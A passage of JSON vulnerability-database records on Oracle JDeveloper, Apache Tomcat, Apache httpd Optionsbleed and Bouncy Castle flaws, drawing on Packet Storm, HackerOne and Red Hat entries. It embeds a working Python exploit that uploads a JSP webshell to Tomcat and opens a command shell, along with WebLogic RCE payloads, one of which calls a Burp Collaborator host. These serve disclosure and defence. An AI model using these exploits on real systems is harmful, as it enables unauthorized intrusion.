Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle JDeveloper. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle JDeveloper, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle JDeveloper accessible data as well as unauthorized update, insert or delete access to some of Oracle JDeveloper accessible data. CVSS 3.0 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 4.7}, "published": "2018-01-18T02:29:00", "type": "prion", "title": "Design/Logic Flaw", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-2711"], "modified": "2019-10-03T00:03:00", "id": "PRION:CVE-2018-2711", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2018-2711", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2023-11-22T03:01:25", "description": "When running Apache 
Tomcat versions 9.0.0.M1 to 9.0.0, 8.5.0 to 8.5.22, 8.0.0.RC1 to 8.0.46 and 7.0.0 to 7.0.81 with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default servlet to false) it was possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "source": "nvd@nist.gov", "type": "Primary", "impactScore": 5.9}, "published": "2017-10-04T01:29:00", "type": "prion", "title": "Code injection", "bulletinFamily": "NVD", "cvss2": {"baseSeverity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12617"], "modified": "2019-04-23T19:29:00", "id": "PRION:CVE-2017-12617", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2017-12617", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-22T03:22:47", "description": "Apache httpd allows remote attackers to read secret data from process memory if the Limit directive can be set in a user's .htaccess file, or if httpd.conf has certain misconfigurations, aka Optionsbleed. 
This affects the Apache HTTP Server through 2.2.34 and 2.4.x through 2.4.27. The attacker sends an unauthenticated OPTIONS HTTP request when attempting to read secret data. This is a use-after-free issue and thus secret data is not always sent, and the specific data depends on many factors including configuration. Exploitation with .htaccess can be blocked with a patch to the ap_limit_section function in server/core.c.", "cvss3": {"cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}}, "published": "2017-09-18T15:29:00", "type": "prion", "title": "Design/Logic Flaw", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9798"], "modified": "2021-06-06T11:15:00", "id": "PRION:CVE-2017-9798", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2017-9798", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-11-22T03:56:58", "description": "The Bouncy Castle Java library before 1.51 does not validate that a point is within the elliptic curve, which makes it easier for remote attackers to obtain private keys via a series of crafted elliptic curve Diffie Hellman (ECDH) key exchanges, aka an \"invalid curve attack.\"", "cvss3": {}, "published": "2015-11-09T16:59:00", 
"type": "prion", "title": "Information disclosure", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7940"], "modified": "2019-01-16T19:29:00", "id": "PRION:CVE-2015-7940", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2015-7940", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "packetstorm": [{"lastseen": "2018-01-19T00:21:27", "description": "", "cvss3": {}, "published": "2018-01-18T00:00:00", "type": "packetstorm", "title": "Oracle JDeveloper IDE Directory Traversal", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-10273"], "modified": "2018-01-18T00:00:00", "id": "PACKETSTORM:145966", "href": "https://packetstormsecurity.com/files/145966/Oracle-JDeveloper-IDE-Directory-Traversal.html", "sourceData": "`[+] Credits: John Page (aka hyp3rlinx) \n[+] Website: hyp3rlinx.altervista.org \n[+] Source: http://hyp3rlinx.altervista.org/advisories/ORACLE-JDEVELOPER-DIRECTORY-TRAVERSAL.txt \n[+] ISR: apparition security \n \n \nVendor: \n============= \nwww.oracle.com \n \n \nProduct: \n=========== \nJDeveloper IDE \n \nOracle JDeveloper is a free integrated development environment that simplifies the development of Java-based \napplications addressing every step of the application lifecycle. 
\n \n \n \nVulnerability Type: \n=================== \nDirectory Traversal \n \n \n \nCVE Reference: \n============== \nCVE-2017-10273 \n \n \n \nSecurity Issue: \n================ \nAttackers can place malicious files outside intended target directories if tricked into importing corrupt .WAR or .EAR archives. \nLater, attackers can potentially request these scripts/files to execute system commands on affected target. \n \n \nAffected versions: \n11.1.1.7.0, 11.1.1.7.1, 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0, 12.2.1.2.0 \n \n \nReferences: \n============ \nhttp://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html \n \n \n \nExploit/POC: \n============= \n1) create evil .WAR or .EAR archive containing ../ in path name to initiate directory traversal and inside a script to execute system commands. \n2) import into JDeveloper \n3) files get moved outside target directories to one of the attackers choosing. \n4) attacker requests the malicious file contained in target directory. \n \nBAM! \n \n \nNetwork Access: \n=============== \nLocal \n \n \n \nSeverity: \n========= \nLow \n \n \n \nDisclosure Timeline: \n============================= \nVendor Notification: October 14, 2016 \nVendor fixes as part of CPU January 16, 2018 \nJanuary 17, 2018 : Public Disclosure \n \n \n \n[+] Disclaimer \nThe information contained within this advisory is supplied \"as-is\" with no warranties or guarantees of fitness of use or otherwise. \nPermission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and \nthat due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit \nis given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility \nfor any damage caused by the use or misuse of this information. 
The author prohibits any malicious use of security related information \nor exploits by the author or elsewhere. All content (c). \n \nhyp3rlinx \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/145966/ORACLE-JDEVELOPER-DIRECTORY-TRAVERSAL.txt", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-10-11T22:38:48", "description": "", "cvss3": {}, "published": "2017-10-10T00:00:00", "type": "packetstorm", "title": "Apache Tomcat Upload Bypass / Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-12617"], "modified": "2017-10-10T00:00:00", "id": "PACKETSTORM:144557", "href": "https://packetstormsecurity.com/files/144557/Apache-Tomcat-Upload-Bypass-Remote-Code-Execution.html", "sourceData": "`#!/usr/bin/python \nimport requests \nimport re \nimport signal \nfrom optparse import OptionParser \n \n \n \n \n \n \n \n \nclass bcolors: \nHEADER = '\\033[95m' \nOKBLUE = '\\033[94m' \nOKGREEN = '\\033[92m' \nWARNING = '\\033[93m' \nFAIL = '\\033[91m' \nENDC = '\\033[0m' \nBOLD = '\\033[1m' \nUNDERLINE = '\\033[4m' \n \n \n \n \nbanner=\"\"\" \n \n \n_______ ________ ___ ___ __ ______ __ ___ __ __ ______ \n/ ____\\ \\ / / ____| |__ \\ / _ \\/_ |____ | /_ |__ \\ / //_ |____ | \n| | \\ \\ / /| |__ ______ ) | | | || | / /_____| | ) / /_ | | / / \n| | \\ \\/ / | __|______/ /| | | || | / /______| | / / '_ \\| | / / \n| |____ \\ / | |____ / /_| |_| || | / / | |/ /| (_) | | / / \n\\_____| \\/ |______| |____|\\___/ |_|/_/ |_|____\\___/|_|/_/ \n \n \n \n[@intx0x80] \n \n\"\"\" \n \n \n \n \n \ndef signal_handler(signal, frame): \n \nprint (\"\\033[91m\"+\"\\n[-] Exiting\"+\"\\033[0m\") \n \nexit() \n \nsignal.signal(signal.SIGINT, signal_handler) \n \n \n \n \ndef removetags(tags): \nremove = re.compile('<.*?>') \ntxt = re.sub(remove, '\\n', tags) \nreturn txt.replace(\"\\n\\n\\n\",\"\\n\") \n \n \ndef getContent(url,f): \nheaders = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, 
like Gecko) Chrome/39.0.2171.95 Safari/537.36'} \nre=requests.get(str(url)+\"/\"+str(f), headers=headers) \nreturn re.content \n \ndef createPayload(url,f): \nevil='<% out.println(\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAA\");%>' \nheaders = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'} \nreq=requests.put(str(url)+str(f)+\"/\",data=evil, headers=headers) \nif req.status_code==201: \nprint \"File Created ..\" \n \n \ndef RCE(url,f): \nEVIL=\"\"\"<FORM METHOD=GET ACTION='{}'>\"\"\".format(f)+\"\"\" \n<INPUT name='cmd' type=text> \n<INPUT type=submit value='Run'> \n</FORM> \n<%@ page import=\"java.io.*\" %> \n<% \nString cmd = request.getParameter(\"cmd\"); \nString output = \"\"; \nif(cmd != null) { \nString s = null; \ntry { \nProcess p = Runtime.getRuntime().exec(cmd,null,null); \nBufferedReader sI = new BufferedReader(new \nInputStreamReader(p.getInputStream())); \nwhile((s = sI.readLine()) != null) { output += s+\"</br>\"; } \n} catch(IOException e) { e.printStackTrace(); } \n} \n%> \n<pre><%=output %></pre>\"\"\" \n \n \n \nheaders = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'} \n \nreq=requests.put(str(url)+f+\"/\",data=EVIL, headers=headers) \n \n \n \ndef shell(url,f): \n \nwhile True: \nheaders = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'} \ncmd=raw_input(\"$ \") \npayload={'cmd':cmd} \nif cmd==\"q\" or cmd==\"Q\": \nbreak \n \nre=requests.get(str(url)+\"/\"+str(f),params=payload,headers=headers) \nre=str(re.content) \nt=removetags(re) \nprint t \n \n \n \n \n \n#print bcolors.HEADER+ banner+bcolors.ENDC \n \nparse=OptionParser( \n \n \nbcolors.HEADER+\"\"\" \n \n \n_______ ________ ___ ___ __ ______ __ ___ __ __ ______ \n/ ____\\ \\ / / ____| |__ \\ / _ \\/_ |____ | /_ |__ \\ / //_ |____ | 
\n| | \\ \\ / /| |__ ______ ) | | | || | / /_____| | ) / /_ | | / / \n| | \\ \\/ / | __|______/ /| | | || | / /______| | / / '_ \\| | / / \n| |____ \\ / | |____ / /_| |_| || | / / | |/ /| (_) | | / / \n\\_____| \\/ |______| |____|\\___/ |_|/_/ |_|____\\___/|_|/_/ \n \n \n \n \n./cve-2017-12617.py [options] \n \noptions: \n \n-u ,--url [::] check target url if it's vulnerable \n-p,--pwn [::] generate webshell and upload it \n-l,--list [::] hosts list \n \n[+]usage: \n \n./cve-2017-12617.py -u http://127.0.0.1 \n./cve-2017-12617.py --url http://127.0.0.1 \n./cve-2017-12617.py -u http://127.0.0.1 -p pwn \n./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn \n./cve-2017-12617.py -l hotsts.txt \n./cve-2017-12617.py --list hosts.txt \n \n \n[@intx0x80] \n \n\"\"\"+bcolors.ENDC \n \n) \n \n \nparse.add_option(\"-u\",\"--url\",dest=\"U\",type=\"string\",help=\"Website Url\") \nparse.add_option(\"-p\",\"--pwn\",dest=\"P\",type=\"string\",help=\"generate webshell and upload it\") \nparse.add_option(\"-l\",\"--list\",dest=\"L\",type=\"string\",help=\"hosts File\") \n \n(opt,args)=parse.parse_args() \n \nif opt.U==None and opt.P==None and opt.L==None: \nprint(parse.usage) \nexit(0) \n \n \n \nelse: \nif opt.U!=None and opt.P==None and opt.L==None: \nprint bcolors.OKGREEN+banner+bcolors.ENDC \nurl=str(opt.U) \nchecker=\"Poc.jsp\" \nprint bcolors.BOLD +\"Poc Filename {}\".format(checker) \ncreatePayload(str(url)+\"/\",checker) \ncon=getContent(str(url)+\"/\",checker) \nif 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con: \nprint bcolors.WARNING+url+' it\\'s Vulnerable to CVE-2017-12617'+bcolors.ENDC \nprint bcolors.WARNING+url+\"/\"+checker+bcolors.ENDC \n \nelse: \nprint 'Not Vulnerable to CVE-2017-12617 ' \nelif opt.P!=None and opt.U!=None and opt.L==None: \nprint bcolors.OKGREEN+banner+bcolors.ENDC \npwn=str(opt.P) \nurl=str(opt.U) \nprint \"Uploading Webshell .....\" \npwn=pwn+\".jsp\" \nRCE(str(url)+\"/\",pwn) \nshell(str(url),pwn) \nelif opt.L!=None and opt.P==None and opt.U==None: 
\nprint bcolors.OKGREEN+banner+bcolors.ENDC \nw=str(opt.L) \nf=open(w,\"r\") \nprint \"Scaning hosts in {}\".format(w) \nchecker=\"Poc.jsp\" \nfor i in f.readlines(): \ni=i.strip(\"\\n\") \ncreatePayload(str(i)+\"/\",checker) \ncon=getContent(str(i)+\"/\",checker) \nif 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con: \nprint str(i)+\"\\033[91m\"+\" [ Vulnerable ] \"\"\\033[0m\" \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/144557/atomcat-uploadexec.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:39", "description": "\nOracle JDeveloper 11.1.x12.x - Directory Traversal", "cvss3": {"exploitabilityScore": 0.6, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "LOW", "integrityImpact": "LOW", "baseScore": 4.7, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:C/C:L/I:L/A:L", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.7}, "published": "2018-01-21T00:00:00", "type": "exploitpack", "title": "Oracle JDeveloper 11.1.x12.x - Directory Traversal", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "LOW", "exploitabilityScore": 1.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 3.7, "vectorString": "AV:L/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10273"], "modified": "2018-01-21T00:00:00", "id": "EXPLOITPACK:65B3837C7995B55CBE45A13A505B8C67", "href": "", "sourceData": "[+] Credits: John Page (aka hyp3rlinx)\t\t\n[+] Website: hyp3rlinx.altervista.org\n[+] Source: 
http://hyp3rlinx.altervista.org/advisories/ORACLE-JDEVELOPER-DIRECTORY-TRAVERSAL.txt\n[+] ISR: apparition security \n \n\nVendor:\n=============\nwww.oracle.com\n\n\nProduct:\n===========\nJDeveloper IDE\n\nOracle JDeveloper is a free integrated development environment that simplifies the development of Java-based\napplications addressing every step of the application lifecycle.\n\n\n\nVulnerability Type:\n===================\nDirectory Traversal\n\n\n\nCVE Reference:\n==============\nCVE-2017-10273\n\n\n\nSecurity Issue:\n================\nAttackers can place malicious files outside intended target directories if tricked into importing corrupt .WAR or .EAR archives.\nLater, attackers can potentially request these scripts/files to execute system commands on affected target.\n\n\nAffected versions:\n11.1.1.7.0, 11.1.1.7.1, 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0, 12.2.1.2.0\n\n\nReferences:\n============\nhttp://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html\n\n\n\nExploit/POC:\n=============\n1) create evil .WAR or .EAR archive containing ../ in path name to initiate directory traversal and inside a script to execute system commands.\n2) import into JDeveloper\n3) files get moved outside target directories to one of the attackers choosing.\n4) attacker requests the malicious file contained in target directory.\n\nBAM!\n\n\nNetwork Access:\n===============\nLocal\n\n\n\nSeverity:\n=========\nLow\n\n\n\nDisclosure Timeline:\n=============================\nVendor Notification: October 14, 2016\nVendor fixes as part of CPU January 16, 2018\nJanuary 17, 2018 : Public Disclosure\n\n\n\n[+] Disclaimer\nThe information contained within this advisory is supplied \"as-is\" with no warranties or guarantees of fitness of use or otherwise.\nPermission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and\nthat due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit\nis given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility\nfor any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information\nor exploits by the author or elsewhere. All content (c).\n\nhyp3rlinx", "cvss": {"score": 3.7, "vector": "AV:L/AC:H/Au:N/C:P/I:P/A:P"}}], "hackerone": [{"lastseen": "2023-10-14T03:16:15", "bounty": 0.0, "description": "##Description\nHello. I was able to identify 3 more RCE vulnerabilities due to the outdated Oracle Weblogic instance on the \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588, \u2588\u2588\u2588, \u2588\u2588\u2588\u2588\u2588\nAfter my previous discoveries I decided to dig deeper into the `\u2588\u2588\u2588.mil` scope/IP space and found other instances of vulnerable Oracle WebLogic. I decided to fill all this additional findings in the single report\n\n##POC\nThis request to the https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/wls-wsat/CoordinatorPortType will trigger sleep for 10 seconds (same applies for \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588, \u2588\u2588\u2588\u2588\u2588\u2588\u2588):\n\n```\nPOST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\nContent-Length: 423\ncontent-type: text/xml\nAccept-Encoding: gzip, deflate, compress\nAccept: */*\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soapenv:Header>\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n <java class=\"java.beans.XMLDecoder\">\n <object class=\"java.lang.Thread\" method=\"sleep\">\n <long>10000</long>\n </object>\n </java> \n </work:WorkContext>\n </soapenv:Header>\n <soapenv:Body/>\n</soapenv:Envelope>\n```\n\nThe next request will resolve custom Burp 
Collaborator hostname via `nslookup` OS command to prove that it's possible to exfiltrate data via DNS:\n```\nPOST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: \u2588\u2588\u2588\nContent-Length: 724\ncontent-type: text/xml\nAccept-Encoding: gzip, deflate, compress\nAccept: */*\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n\t<soapenv:Header>\n\t\t<work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"> \n\t\t\t<java version=\"1.8.0_151\" class=\"java.beans.XMLDecoder\"> \n\t\t\t<void class=\"java.lang.ProcessBuilder\"> \n\t\t\t\t<array class=\"java.lang.String\" length=\"3\">\n\t\t\t\t<void index = \"0\">\n\t\t\t\t\t<string>cmd</string>\n\t\t\t\t</void>\n\t\t\t\t<void index = \"1\"> \n\t\t\t\t\t<string>/c</string> \n\t\t\t\t</void>\n\t\t\t\t<void index = \"2\">\n\t\t\t\t\t<string>nslookup j3nxpi8ecz9uznkpu32mb7pj9af13q.burpcollaborator.net</string>\n\t\t\t\t</void>\n\t\t\t</array>\n\t\t\t<void method=\"start\"/>\n\t\t\t</void>\n\t\t\t</java>\n\t\t\t</work:WorkContext> \n\t</soapenv:Header> \n<soapenv:Body/>\n</soapenv:Envelope>\n```\n\n\nNote: to reproduce the second case with `nslookup`, `j3nxpi8ecz9uznkpu32mb7pj9af13q.burpcollaborator.net` host should be replaced by your own Burp Collaborator instance to catch the DNS request\n\n##Suggested fix\nPatching WebLogic to the resent version will fix the issue.\n\n## Impact\n\nRemote OS command execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 9.9, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.3}, "published": "2019-07-03T19:21:18", "type": "hackerone", "title": "U.S. 
Dept Of Defense: Remote OS command Execution in the 3 more Oracle Weblogic on the \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588, \u2588\u2588\u2588\u2588, \u2588\u2588\u2588\u2588\u2588\u2588\u2588 [CVE-2017-10352]", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10352"], "modified": "2019-10-08T18:38:21", "id": "H1:634630", "href": "https://hackerone.com/reports/634630", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-10-17T07:45:27", "bounty": 100.0, "description": "Bug has been disclosed here:\nhttps://blog.fuzzing-project.org/60-Optionsbleed-HTTP-OPTIONS-method-can-leak-Apaches-server-memory.html\n\npoc code:\nhttps://github.com/hannob/optionsbleed\n\nApache is currently preparing 2.4.28, which will contain the fix, a patch is available in their svn repo.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-09-19T18:04:00", "type": "hackerone", "title": "Internet Bug Bounty: Optionsbleed / CVE-2017-9798", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9798"], "modified": "2018-05-03T14:45:58", "id": "H1:269568", "href": "https://hackerone.com/reports/269568", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "redhat": [{"lastseen": "2023-11-29T10:41:39", "description": "The httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server.\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols, as well as a full-strength general-purpose cryptography library.\n\nApache Tomcat is a servlet container for the Java Servlet and JavaServer Pages (JSP) technologies.\n\nThis release provides an update to httpd, OpenSSL and Tomcat 6/7 for Red Hat JBoss Web Server 2.1.2. The updates are documented in the Release Notes document linked to in the References.\n\nThis release of Red Hat JBoss Web Server 2.1.2 Service Pack 2 serves as a update for Red Hat JBoss Web Server 2, and includes bug fixes, which are documented in the Release Notes document linked to in the References.\n\nUsers of Red Hat JBoss Web Server 2 should upgrade to these updated packages, which resolve several security issues.\n\nSecurity Fix(es):\n\n* It was discovered that the httpd's mod_auth_digest module did not properly initialize memory before using it when processing certain headers related to digest authentication. A remote attacker could possibly use this flaw to disclose potentially sensitive information or cause httpd child process to crash by sending specially crafted requests to a server. 
(CVE-2017-9788)\n\n* A vulnerability was discovered in Tomcat where if a servlet context was configured with readonly=false and HTTP PUT requests were allowed, an attacker could upload a JSP file to that context and achieve code execution. (CVE-2017-12615)\n\n* A vulnerability was discovered in Tomcat where if a servlet context was configured with readonly=false and HTTP PUT requests were allowed, an attacker could upload a JSP file to that context and achieve code execution. (CVE-2017-12617)\n\n* A flaw was found in the way the DES/3DES cipher was used as part of the TLS/SSL protocol. A man-in-the-middle attacker could use this flaw to recover some plaintext data by capturing large amounts of encrypted traffic between TLS/SSL server and client if the communication used a DES/3DES based ciphersuite. (CVE-2016-2183)\n\n* A use-after-free flaw was found in the way httpd handled invalid and previously unregistered HTTP methods specified in the Limit directive used in an .htaccess file. A remote attacker could possibly use this flaw to disclose portions of the server memory, or cause httpd child process to crash. (CVE-2017-9798)\n\nRed Hat would like to thank OpenVPN for reporting CVE-2016-2183 and Hanno B\u00f6ck for reporting CVE-2017-9798. Upstream acknowledges Karthikeyan Bhargavan (Inria) and Ga\u00ebtan Leurent (Inria) as the original reporters of CVE-2016-2183.\n\nBug Fix(es):\n\n* Corruption in nodestatsmem in multiple core dumps but in different functions of each core dump. 
(BZ#1338640)\n\n* mod_cluster segfaults in process_info() due to wrongly generated assembler instruction movslq (BZ#1448709)\n\n* CRL checking of very large CRLs fails with OpenSSL 1.0.2 (BZ#1493075)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "source": "nvd@nist.gov", "type": "Primary", "impactScore": 5.2}, "published": "2017-11-02T19:03:10", "type": "redhat", "title": "(RHSA-2017:3113) Important: Red Hat JBoss Web Server security and bug fix update", "bulletinFamily": "unix", "cvss2": {"baseSeverity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", 